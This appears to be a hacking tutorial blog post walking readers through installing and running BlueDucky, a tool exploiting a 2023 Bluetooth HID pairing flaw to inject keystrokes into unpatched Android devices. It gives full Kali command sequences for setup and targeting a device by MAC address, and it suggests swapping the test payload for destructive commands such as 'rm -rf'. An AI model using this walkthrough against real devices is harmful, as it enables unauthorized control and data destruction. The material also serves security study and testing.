Welcome back Cyberwarriors!
Bluetooth is a widely used protocol that enables communication between devices that are nearby or within a piconet, like speakers, headphones, and mobile phones. If a hacker manages to exploit Bluetooth, they could potentially gain control over or listen in on any of these devices.
There are various categories of Bluetooth devices, each of which is indicated to the connecting device through a banner. Previously discussed in Bluetooth tutorials is the HID class, arguably one of the most significant classes for exploiting Bluetooth devices. These devices, categorized as Human Interface Devices, include Bluetooth mice and keyboards, which are permitted to transmit inputs necessary for the proper functioning of keyboards and mice.
In 2023, a new Bluetooth vulnerability surfaced, potentially allowing an unauthenticated HID Device to establish an encrypted connection. If successful, this could enable the HID device to inject commands into the connected device. This exploit affects unpatched Android 11 and later devices, as well as any Android 10 and earlier devices lacking available patches. A Proof Of Concept (POC) was unveiled in January 2024 and has since been incorporated into a new tool called BlueDucky.
Let's delve into this tool and explore its capabilities.
Step # 1 Download and Install BlueDucky
To install BlueDucky, we need to do a few things to get our system ready.
First, update your apt cache.
kali > sudo apt update
Next, install the necessary dependencies from the Kali repository.
kali > sudo apt install -y bluez-tools bluez-hcidump libbluetooth-dev git gcc python3-pip python3-setuptools python3-pydbus
We now need to get bluez from github.com.
kali > git clone https://github.com/pybluez/pybluez.git
Now, move into the new directory, pybluez.
kali > cd pybluez
We now need to run the setup script for bluez
kali \> python3 setup.py install
Next, we need to build bdaddr from source. bdaddr enables us to query or set the local Bluetooth device address.
kali > cd ~
kali > git clone --depth=1 github.com/bluez/bluez.git
kali > gcc -o bdaddr ~/bluez/tools/bdaddr.c ~/bluez/src/oui.c -I ~/bluez -lbluetooth
Now, let copy bdaddr to our local binary directory (/usr/local/bin) so that we can use it in our script from anywhere (/usr/local/bin is in the Linux $PATH variable).
kali > sudo cp bdaddr /usr/local/bin
Finally, we should download BlueDucky from github.
kali > git clone github.com/pentestfunctions/BlueDucky.git
kali > cd BlueDucky
kali > sudo hciconfig hci0 up
Step # 2 Run BlueDucky
Now that we've installed all the necessary components to execute BlueDucky, let's give it a try. If you're running it from a system with an external plug-in Bluetooth adapter, like I am, you'll probably need to make a minor adjustment to the Python script. By default, BlueDucky scans for Bluetooth devices using hci0. However, if you've added an external Bluetooth device, it might be recognized as hci1 instead. You can easily fix this by opening the script in your preferred text editor and changing the default value to hci1. In my case, I used the default GUI text editor in Kali, which is mousepad.
kali > sudo mousepad BlueDucky.py
Now, go ahead and save this file. Make certain to give yourself execute permissions.
kali > sudo chmod 755 BlueDucky.py
Now, it's a good idea to double-check that your Bluetooth adapter is powered on and activated.
kali > hciconfig hci1 up
If your adapter is up and running, it's time to start BlueDucky!
kali > sudo python3 BlueDucky.py
If you know the MAC address of the device, you can enter it here. If not, simply hit ENTER and BlueDucky will scan for available MAC addresses.
At this point, you can select "yes"and enter the MAC address of the target device.
When you do so, BlueDucky will run through the requisite commands to compromise the device and if successful, will inject a "hello there 123" to the target device.
Summary
Bluetooth-enabled devices are ubiquitous in our daily lives, ranging from phones and tablets to speakers, headsets, keyboards, and various other gadgets. Before pairing with another device, Bluetooth devices disclose their device type, known as the device class. However, this class declaration can be manipulated by an attacker to inject commands into the device.
BlueDucky is an automated tool designed to exploit this vulnerability. While the tool initially sends a harmless message to the target device, it can be easily modified to transmit malicious commands such as "shutdown" or "rm -rf" to the target device.